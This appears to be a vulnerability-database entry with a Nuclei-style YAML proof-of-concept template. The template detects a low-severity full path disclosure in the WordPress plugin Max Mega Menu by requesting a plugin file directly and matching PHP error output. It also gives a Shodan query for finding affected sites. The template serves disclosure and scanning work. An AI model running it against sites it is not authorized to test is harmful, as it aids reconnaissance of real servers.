wp-megamenu-fpd: WordPress Plugin Max Mega Menu (megamenu) - Full Path Disclosure

2026-01-08 WordPress Plugin Max Mega Menu PoC Public

Description

WordPress Plugin Max Mega Menu plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.

PoC

id: wp-megamenu-fpd

info:
  name: WordPress Plugin Max Mega Menu (megamenu) - Full Path Disclosure
  author: DhiyaneshDk
  severity: low
  description: |
    WordPress Plugin Max Mega Menu plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
  reference:
    - https://wordpress.org/plugins/megamenu/
  metadata:
    max-request: 1
    verified: true
    shodan-query: html:"/plugins/megamenu"
  tags: debug,wordpress,fpd,megamenu,wp-plugin,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/megamenu/integration/zerif/functions.php"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "Uncaught Error:", "/plugins/megamenu/")'
        condition: and
# digest: 4a0a00473045022100eae71cc4c70ae8c555fcf748c6a20fbc0cb6b2f5ce0722494c14d6c769b66c4402205284de727328f580027da188ef44e8a9cf926fbaead6216e389a1a29fb0214d0:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities